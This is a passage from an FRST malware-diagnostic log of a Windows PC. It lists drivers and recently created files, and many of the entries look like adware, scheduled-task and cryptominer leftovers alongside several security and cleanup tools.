R1 TSKSP; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSKsp.sys [204920 2015-07-25] (电脑管家)
S3 TSSK; C:\Windows\System32\tssk.sys [67896 2015-07-25] (电脑管家)
R1 TSSysKit; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSSysKit.sys [101560 2015-07-25] (电脑管家)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-07-26 15:28 - 2015-07-26 15:28 - 00017976 _____ C:\Users\Cucuk\Desktop\FRST.txt
2015-07-26 15:26 - 2015-07-26 15:28 - 00000000 ____D C:\FRST
2015-07-26 15:25 - 2015-07-26 01:28 - 01650688 _____ (Farbar) C:\Users\Cucuk\Desktop\FRST.exe
2015-07-26 15:24 - 2015-07-26 15:24 - 00022901 _____ C:\Users\Cucuk\Desktop\AdwCleaner[R1].txt
2015-07-26 15:19 - 2015-07-26 15:19 - 00027516 _____ C:\Users\Cucuk\Desktop\rk_DEC2.tmp.txt
2015-07-26 13:49 - 2015-07-26 13:49 - 00035064 _____ C:\Windows\system32\Drivers\TrueSight.sys
2015-07-26 10:03 - 2015-07-26 10:03 - 00000000 ____D C:\QMBackup
2015-07-26 09:47 - 2015-07-26 09:47 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\WinRAR
2015-07-26 09:40 - 2015-07-26 15:19 - 00000000 ____D C:\ProgramData\RogueKiller
2015-07-26 09:34 - 2015-07-26 15:23 - 00000000 ____D C:\AdwCleaner
2015-07-26 00:41 - 2015-07-26 00:41 - 00156616 _____ C:\Windows\system32\mmc2015-07-26(00-41-08).dmp
2015-07-25 23:58 - 2015-07-25 23:58 - 00002205 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-07-25 23:58 - 2015-07-25 23:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-07-25 23:57 - 2015-07-26 01:10 - 00000880 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-25 23:57 - 2015-07-25 23:57 - 00000880 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0c79a310c975b.job
2015-07-25 23:56 - 2015-07-25 23:58 - 00000000 ____D C:\Program Files\Google
2015-07-25 23:31 - 2015-07-25 23:31 - 00155623 _____ C:\Windows\system32\mmc2015-07-25(23-31-39).dmp
2015-07-25 23:30 - 2015-07-25 23:31 - 00155277 _____ C:\Windows\system32\mmc2015-07-25(23-30-40).dmp
2015-07-25 22:57 - 2015-07-25 22:58 - 00021210 _____ C:\Windows\iis7.log
2015-07-25 22:57 - 2015-07-25 22:57 - 00000000 ____D C:\Windows\system32\BestPractices
2015-07-25 22:57 - 2015-07-25 22:57 - 00000000 ____D C:\inetpub
2015-07-25 21:37 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\vlc
2015-07-25 21:29 - 2015-07-25 21:29 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\Macromedia
2015-07-25 21:29 - 2015-07-25 21:29 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\Adobe
2015-07-25 19:12 - 2015-07-25 19:12 - 00000278 ____H C:\Windows\Tasks\User_Feed_Synchronization-{3616E477-7CF5-4B18-A6F2-C9A0B002010D}.job
2015-07-25 18:56 - 2015-07-25 18:56 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\Apple Computer
2015-07-25 18:56 - 2015-07-25 18:56 - 00000000 ____D C:\Users\Cucuk\.android
2015-07-25 18:54 - 2015-07-25 23:58 - 00000000 ____D C:\Users\Cucuk\AppData\Local\Google
2015-07-25 18:53 - 2015-07-25 21:57 - 00000000 ___RD C:\Users\Cucuk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-25 18:53 - 2015-07-25 21:57 - 00000000 ___RD C:\Users\Cucuk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-25 18:53 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cucuk
2015-07-25 18:53 - 2015-07-25 20:38 - 00000000 ____D C:\Users\Cucuk\AppData\Local\VirtualStore
2015-07-25 18:53 - 2015-07-25 18:53 - 00109216 _____ C:\Users\Cucuk\AppData\Local\GDIPFONTCACHEV1.DAT
2015-07-25 18:53 - 2015-07-25 18:53 - 00000020 ___SH C:\Users\Cucuk\ntuser.ini
2015-07-25 18:53 - 2015-07-25 18:53 - 00000000 ____D C:\Users\Cucuk\AppData\Roaming\Tencent
2015-07-25 18:53 - 2015-07-25 18:53 - 00000000 ____D C:\Users\Cucuk\AppData\Local\TOSHIBA
2015-07-25 18:53 - 2015-07-25 18:53 - 00000000 ____D C:\Users\Cucuk\AppData\Local\SRS Labs
2015-07-25 18:44 - 2015-07-25 18:44 - 00000000 ____D C:\Program Files\Reference Assemblies
2015-07-25 17:16 - 2015-07-25 17:16 - 00000000 ____D C:\Windows\system32\UploadCache
2015-07-25 14:31 - 2015-07-25 14:31 - 00001132 _____ C:\Users\Cukwenk\Desktop\Live PC Help.lnk
2015-07-25 13:36 - 2015-07-26 09:25 - 00030392 _____ (Tencent) C:\Windows\system32\Drivers\TS888.sys
2015-07-25 13:36 - 2015-07-26 09:25 - 00000202 _____ C:\Windows\Tasks\RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380}.job
2015-07-25 13:35 - 2015-07-26 09:24 - 00002095 _____ C:\Windows\setupact.log
2015-07-25 13:35 - 2015-07-25 17:15 - 00412464 _____ C:\Windows\system32\FNTCACHE.DAT
2015-07-25 13:35 - 2015-07-25 13:35 - 00000000 _____ C:\Windows\setuperr.log
2015-07-25 13:34 - 2015-07-26 09:24 - 00027010 _____ C:\Windows\PFRO.log
2015-07-25 12:29 - 2015-07-25 15:51 - 00000000 ____D C:\Program Files\Common Files\AV
2015-07-25 12:18 - 2015-07-25 12:18 - 00000000 ____D C:\ProgramData\GRETECH
2015-07-25 12:17 - 2015-07-25 14:28 - 00109216 _____ C:\Users\Cukwenk\AppData\Local\GDIPFONTCACHEV1.DAT
2015-07-25 12:14 - 2015-07-25 17:15 - 00000000 ____D C:\ProgramData\MFAData
2015-07-25 12:14 - 2015-07-25 12:14 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\MFAData
2015-07-25 12:14 - 2015-07-25 12:14 - 00000000 ____D C:\Users\Cukwenk\.android
2015-07-25 12:12 - 2015-07-25 12:12 - 00002164 _____ C:\Windows\system32\netupdsrv.exe.lnk
2015-07-25 12:11 - 2015-07-25 12:11 - 00002162 _____ C:\Windows\system32\nethtsrv.exe.lnk
2015-07-25 12:11 - 2015-07-25 12:11 - 00002158 _____ C:\Windows\system32\hfpapi.dll.lnk
2015-07-25 12:11 - 2015-07-25 12:11 - 00002158 _____ C:\Windows\system32\hfnapi.dll.lnk
2015-07-25 12:10 - 2015-07-25 12:10 - 00000132 __RSH C:\rising.ini
2015-07-25 12:10 - 2015-07-25 12:10 - 00000122 _____ C:\Windows\system32\BsMain.ini
2015-07-25 12:10 - 2015-07-25 12:10 - 00000000 ___RD C:\RavBin
2015-07-25 12:10 - 2014-07-29 14:44 - 00091928 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\vpatch.dll
2015-07-25 12:08 - 2013-12-29 19:33 - 00256280 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\ravext.dll
2015-07-25 12:08 - 2012-09-05 12:30 - 00240472 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\bsmain.exe
2015-07-25 12:07 - 2015-05-14 17:00 - 00077080 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\Drivers\kguard.sys
2015-07-25 12:07 - 2015-04-29 13:17 - 00157896 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\Drivers\sysmon.sys
2015-07-25 12:07 - 2015-04-08 17:00 - 00083384 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\Drivers\rsutils.sys
2015-07-25 12:07 - 2012-02-28 19:49 - 00010808 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\Drivers\rsndisp.sys
2015-07-25 12:06 - 2015-07-25 12:10 - 00000000 ____D C:\ProgramData\Rising
2015-07-25 12:06 - 2015-07-25 12:07 - 00000000 ____D C:\Program Files\Rising
2015-07-25 12:06 - 2014-05-27 19:37 - 00024120 ____N (Beijing Rising Information Technology Co., Ltd.) C:\Windows\system32\Drivers\protreg.sys
2015-07-25 12:04 - 2015-07-25 12:04 - 00000000 ____D C:\ProgramData\TXQMPC
2015-07-25 12:04 - 2015-07-25 12:02 - 00014008 _____ (Tencent) C:\Windows\system32\Drivers\TSDefenseBt.sys
2015-07-25 12:03 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\gmsd_ra_005010040
2015-07-25 12:03 - 2015-07-25 12:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\gmsd_ra_005010040
2015-07-25 12:03 - 2015-07-25 12:04 - 00000000 ____D C:\Program Files\Common Files\Tencent
2015-07-25 12:03 - 2015-07-25 12:02 - 00150072 _____ (电脑管家) C:\Windows\system32\Drivers\TFsFlt.sys
2015-07-25 12:03 - 2015-07-25 12:02 - 00138552 _____ (Tencent Technology(Shenzhen) Company Limited) C:\Windows\system32\Drivers\TAOKernel.sys
2015-07-25 12:03 - 2015-07-25 12:02 - 00077016 _____ (Tencent) C:\Windows\system32\Drivers\TAOAccelerator.sys
2015-07-25 12:03 - 2015-07-25 12:02 - 00067896 _____ (电脑管家) C:\Windows\system32\TSSK.sys
2015-07-25 12:02 - 2015-07-25 12:02 - 00124792 _____ (电脑管家) C:\Windows\system32\Drivers\TsFltMgr.sys
2015-07-25 12:02 - 2015-07-25 12:02 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\腾讯软件
2015-07-25 12:01 - 2015-07-25 12:18 - 00000000 ____D C:\ProgramData\Tencent
2015-07-25 12:01 - 2015-07-25 12:03 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Tencent
2015-07-25 12:01 - 2015-07-25 12:01 - 00000000 ____D C:\Program Files\Tencent
2015-07-25 12:00 - 2015-07-25 12:00 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsp7993.tmp
2015-07-25 11:54 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\GRETECH
2015-07-25 11:54 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOM Player
2015-07-25 11:54 - 2015-07-25 11:54 - 00001183 _____ C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\GOM Player.lnk
2015-07-25 11:54 - 2015-07-25 11:54 - 00001159 _____ C:\Users\Public\Desktop\GOM Player.lnk
2015-07-25 11:47 - 2015-07-25 21:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnyProtect PC Backup
2015-07-25 11:47 - 2015-07-25 12:02 - 00001007 _____ C:\Users\Cukwenk\Desktop\AnyProtect.lnk
2015-07-25 11:44 - 2015-07-25 11:41 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsn67E7.tmp
2015-07-25 11:41 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\Quebles Emoticons
2015-07-25 11:41 - 2015-07-25 12:20 - 00000000 ____D C:\Program Files\AnyProtectEx
2015-07-25 11:40 - 2015-07-25 11:40 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Macromedia
2015-07-25 11:40 - 2015-07-25 11:40 - 00000000 ____D C:\ProgramData\WindowsMangerProtect
2015-07-25 11:30 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\CD674440-1437823846-11E1-8EA2-047D7BFA1DE9
2015-07-25 11:29 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\ASPackage
2015-07-25 11:29 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\SysassistByHotWheel
2015-07-25 11:29 - 2015-07-25 14:20 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
2015-07-25 11:29 - 2015-07-25 12:33 - 00000000 ____D C:\Program Files\CD674440-1437866985-11E1-8EA2-047D7BFA1DE9
2015-07-25 11:28 - 2015-07-25 14:27 - 00000000 ____D C:\IQIYI Video
2015-07-25 11:27 - 2015-07-25 14:25 - 00000000 ____D C:\ProgramData\IQIYI Video
2015-07-25 11:27 - 2015-07-25 11:28 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\IQIYI Video
2015-07-25 11:27 - 2015-07-25 11:27 - 00000000 ____D C:\Users\Public\QiYi
2015-07-25 11:25 - 2015-07-25 12:08 - 00000000 ____D C:\Program Files\baidu
2015-07-25 11:25 - 2015-07-25 11:25 - 00000687 _____ C:\awh3D6.tmp
2015-07-25 09:27 - 2015-07-25 12:12 - 00000000 ____D C:\Program Files\RanndomPRiiice
2015-07-25 09:07 - 2015-07-25 12:11 - 00000000 ____D C:\Program Files\TrimEdit
2015-07-25 06:50 - 2015-07-25 06:49 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsh3150.tmp
2015-07-25 06:20 - 2015-07-25 06:20 - 00000687 _____ C:\awh8E5.tmp
2015-07-24 20:08 - 2015-07-24 20:08 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsa5A05.tmp
2015-07-24 19:30 - 2015-07-24 19:30 - 00000687 _____ C:\awhEAF.tmp
2015-07-24 11:18 - 2015-07-24 11:18 - 00000687 _____ C:\awh1351.tmp
2015-07-23 18:03 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\{8062D808-B313-48F4-ADF2-593DC921C2A5}
2015-07-23 15:55 - 2015-07-23 15:55 - 00000687 _____ C:\awh702.tmp
2015-07-23 12:09 - 2015-07-23 12:09 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsfD46F.tmp
2015-07-23 12:04 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\gmsd_ra_005010038
2015-07-23 12:04 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\gmsd_ra_005010038
2015-07-23 11:33 - 2015-07-23 11:33 - 00000687 _____ C:\awh943.tmp
2015-07-23 02:31 - 2015-07-23 02:31 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nss91EA.tmp
2015-07-23 02:03 - 2015-07-23 02:03 - 00000687 _____ C:\awhC01.tmp
2015-07-22 21:45 - 2015-07-25 13:17 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-07-22 21:45 - 2015-07-22 21:45 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-07-22 21:45 - 2015-07-22 21:45 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2015-07-22 19:13 - 2015-07-22 19:13 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsdCD32.tmp
2015-07-22 18:32 - 2015-07-22 18:32 - 00000687 _____ C:\awhF362.tmp
2015-07-16 17:41 - 2015-07-16 17:41 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2015-07-15 20:57 - 2015-07-25 12:08 - 00000000 ____D C:\Program Files\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9
2015-07-15 20:57 - 2015-07-15 20:57 - 00000000 ____D C:\Program Files\CD674440-1436881159-11E1-8EA2-047D7BFA1DE9
2015-07-15 20:37 - 2015-07-15 20:37 - 00000670 __RSH C:\ProgramData\ntuser.pol
2015-07-15 19:31 - 2015-07-15 19:31 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nscCF02.tmp
2015-07-14 16:41 - 2015-07-25 11:20 - 00002438 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5_user.job
2015-07-14 16:41 - 2015-07-25 11:20 - 00002438 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5.job
2015-07-14 16:40 - 2015-07-25 13:35 - 00003130 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-6.job
2015-07-14 16:40 - 2015-07-25 12:48 - 00000000 ____D C:\Program Files\a5a9a4b1-0770-4818-adf9-8ba1777405b5
2015-07-14 16:40 - 2015-07-25 12:40 - 00005510 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6.job
2015-07-14 16:40 - 2015-07-25 11:20 - 00005510 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-7.job
2015-07-14 16:40 - 2015-07-25 11:20 - 00005176 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-11.job
2015-07-14 16:40 - 2015-07-25 11:20 - 00004486 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-4.job
2015-07-14 16:40 - 2015-07-25 11:20 - 00004150 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-3.job
2015-07-14 16:40 - 2015-07-25 11:20 - 00003466 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-7.job
2015-07-14 16:40 - 2015-07-14 16:39 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsiB519.tmp
2015-07-14 16:39 - 2015-07-25 14:09 - 00000000 ____D C:\Program Files\CinemaPlus-3.2cV14.07
2015-07-14 16:39 - 2015-07-25 12:39 - 00002104 _____ C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10_user.job
2015-07-14 16:36 - 2015-07-14 16:36 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nshA9BA.tmp
2015-07-14 16:35 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\14536
2015-07-14 16:35 - 2015-07-25 11:20 - 00000376 _____ C:\Windows\Tasks\AmiUpdXp.job
2015-07-14 14:46 - 2015-07-14 14:46 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsz189C.tmp
2015-07-14 14:43 - 2015-07-14 14:43 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nso50EE.tmp
2015-07-14 14:07 - 2015-07-25 21:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\vlc
2015-07-14 13:46 - 2015-07-14 13:46 - 00000000 ____D C:\Windows\system32\Macromed
2015-07-14 12:20 - 2015-07-25 13:35 - 00004452 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-4.job
2015-07-14 12:20 - 2015-07-25 13:35 - 00003096 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-1-7.job
2015-07-14 12:20 - 2015-07-25 13:35 - 00002404 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-5.job
2015-07-14 12:20 - 2015-07-25 13:20 - 00003096 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-1-6.job
2015-07-14 12:20 - 2015-07-25 12:20 - 00002404 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-5_user.job
2015-07-14 12:20 - 2015-07-14 12:20 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsq900D.tmp
2015-07-14 12:19 - 2015-07-25 13:19 - 00005476 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-6.job
2015-07-14 12:19 - 2015-07-25 13:19 - 00002070 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-10_user.job
2015-07-14 12:19 - 2015-07-25 12:19 - 00005476 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-7.job
2015-07-14 12:19 - 2015-07-25 12:19 - 00004798 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-11.job
2015-07-14 12:19 - 2015-07-25 12:19 - 00004116 _____ C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-3.job
2015-07-14 12:19 - 2015-07-14 12:19 - 00000000 ____D C:\Program Files\11b1563c-affa-4439-b9f5-9a7bb48fa3ff
2015-07-14 12:17 - 2015-07-14 12:17 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nspC0FF.tmp
2015-07-14 11:36 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2015-07-14 11:36 - 2015-07-14 11:36 - 00001028 _____ C:\Users\Public\Desktop\VLC media player.lnk
2015-07-14 11:35 - 2015-07-14 11:35 - 00000000 ____D C:\Program Files\VideoLAN
2015-07-14 11:17 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced System~Protector
2015-07-14 11:17 - 2015-07-14 11:17 - 00000000 ____D C:\ProgramData\Systweak
2015-07-14 11:17 - 2015-07-14 11:17 - 00000000 ____D C:\Program Files\ASP
2015-07-14 11:17 - 2015-06-29 18:24 - 00018216 _____ C:\Windows\system32\sasnative32.exe
2015-07-14 10:19 - 2015-07-14 10:19 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsj9912.tmp
2015-07-14 09:44 - 2015-07-14 09:44 - 00000000 ____D C:\Program Files\predm
2015-07-14 09:24 - 2015-07-14 09:24 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nso7EDD.tmp
2015-07-14 09:24 - 2015-07-14 09:24 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsj73C6.tmp
2015-07-14 09:10 - 2015-07-14 09:10 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nso2C4B.tmp
2015-07-14 02:13 - 2015-07-14 09:45 - 00000000 ____D C:\Program Files\gmsd_ra_005010030
2015-07-14 02:12 - 2015-07-25 09:07 - 00000000 ____D C:\ProgramData\c147d200000364f
2015-07-14 02:06 - 2015-07-14 02:06 - 00000045 _____ C:\Users\Cukwenk\AppData\Roaming\WB.CFG
2015-07-14 02:03 - 2015-07-14 02:03 - 00000000 _____ C:\Users\Cukwenk\AppData\Local\Temp.dat
2015-07-14 01:53 - 2015-07-14 01:53 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nscC5E5.tmp
2015-07-14 01:52 - 2015-07-25 11:20 - 00002420 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5_user.job
2015-07-14 01:51 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\cpuminer
2015-07-14 01:51 - 2015-07-25 12:51 - 00003112 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6.job
2015-07-14 01:51 - 2015-07-25 11:20 - 00004132 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-4.job
2015-07-14 01:51 - 2015-07-25 11:20 - 00003112 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-7.job
2015-07-14 01:51 - 2015-07-25 11:20 - 00002420 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5.job
2015-07-14 01:50 - 2015-07-25 14:11 - 00000000 ____D C:\Program Files\SavePass 1.1
2015-07-14 01:50 - 2015-07-25 13:35 - 00005492 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6.job
2015-07-14 01:50 - 2015-07-25 12:50 - 00002086 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10_user.job
2015-07-14 01:50 - 2015-07-25 11:20 - 00005156 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-7.job
2015-07-14 01:50 - 2015-07-25 11:20 - 00004814 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-11.job
2015-07-14 01:50 - 2015-07-25 11:20 - 00004132 _____ C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-3.job
2015-07-14 01:50 - 2015-07-14 16:40 - 00000000 ____D C:\Program Files\141eff10-cc51-461a-a429-b050fca21181
2015-07-14 01:42 - 2015-07-25 11:41 - 00000000 ____D C:\ProgramData\9201185608438035577
2015-07-14 01:42 - 2015-07-14 02:11 - 00000000 ____D C:\Program Files\CuuttThEPriucce
2015-07-14 01:41 - 2015-07-14 01:41 - 00000000 ____D C:\ProgramData\lojdkkabciignnppakcahhgihclijfid
2015-07-14 01:40 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\CD674440-1436838005-11E1-8EA2-047D7BFA1DE9
2015-07-14 01:39 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\CD674440-1436881159-11E1-8EA2-047D7BFA1DE9
2015-07-14 01:38 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\See Results Hub
2015-07-14 01:38 - 2015-07-25 12:48 - 00000000 ____D C:\ProgramData\3a65b31f-fd78-451b-b99b-7557d173b95d
2015-07-14 01:38 - 2015-07-25 12:48 - 00000000 ____D C:\Program Files\Common Files\3a65b31f-fd78-451b-b99b-7557d173b95d
2015-07-14 01:36 - 2015-07-25 12:20 - 00000000 ____D C:\ProgramData\{c9a57a36-327b-fad7-c9a5-57a36327e8d8}
2015-07-14 01:36 - 2015-07-25 07:36 - 00000328 _____ C:\Windows\Tasks\TuneInPro.job
2015-07-14 01:27 - 2015-07-14 01:27 - 00000000 ____D C:\ProgramData\Sun
2015-07-14 01:27 - 2015-07-14 01:27 - 00000000 ____D C:\Program Files\Common Files\Java
2015-07-14 01:27 - 2015-07-14 01:26 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2015-07-14 01:26 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2015-07-14 01:26 - 2015-07-14 01:27 - 00000000 ____D C:\ProgramData\Oracle
2015-07-14 01:25 - 2015-07-14 01:25 - 00000000 ____D C:\Program Files\Java
2015-07-14 01:08 - 2015-07-14 01:09 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Chromium
2015-07-14 01:06 - 2015-07-14 12:29 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\{8550B30C-A1F8-DFB4-CC60-FA5CE80806C4}
2015-07-14 01:06 - 2015-07-14 12:06 - 00000278 _____ C:\Windows\Tasks\Run_Dregol.job
2015-07-14 01:06 - 2015-07-14 01:06 - 00000000 ____D C:\ProgramData\{9A2272E1-CAA0-A367-7B26-D3E5ABA4006B}
2015-07-14 01:05 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\Jungle Net
2015-07-14 01:05 - 2015-07-25 12:48 - 00000000 ____D C:\ProgramData\31f7a620-acbd-4f84-82db-5e231b8ad5de
2015-07-14 01:05 - 2015-07-25 12:48 - 00000000 ____D C:\Program Files\Common Files\31f7a620-acbd-4f84-82db-5e231b8ad5de
2015-07-13 17:46 - 2015-07-13 17:46 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsm83E0.tmp
2015-07-13 17:41 - 2015-07-13 17:41 - 00000000 ____D C:\Windows\system32\appmgmt
2015-07-13 17:37 - 2015-07-25 11:37 - 00002404 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-5_user.job
2015-07-13 17:37 - 2015-07-25 11:37 - 00002404 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-5.job
2015-07-13 17:37 - 2015-07-13 17:37 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsj317A.tmp
2015-07-13 17:36 - 2015-07-25 13:35 - 00003096 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-1-6.job
2015-07-13 17:36 - 2015-07-25 12:36 - 00005476 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-6.job
2015-07-13 17:36 - 2015-07-25 11:36 - 00005140 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-7.job
2015-07-13 17:36 - 2015-07-25 11:36 - 00004798 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-11.job
2015-07-13 17:36 - 2015-07-25 11:36 - 00004452 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-4.job
2015-07-13 17:36 - 2015-07-25 11:36 - 00003096 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-1-7.job
2015-07-13 17:36 - 2015-07-14 12:19 - 00000000 ____D C:\Program Files\4200ca2f-eb59-4154-b947-6a964429984f
2015-07-13 17:35 - 2015-07-25 14:09 - 00000000 ____D C:\Program Files\GoHD
2015-07-13 17:35 - 2015-07-25 12:35 - 00002070 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-10_user.job
2015-07-13 17:35 - 2015-07-25 11:39 - 00004116 _____ C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-3.job
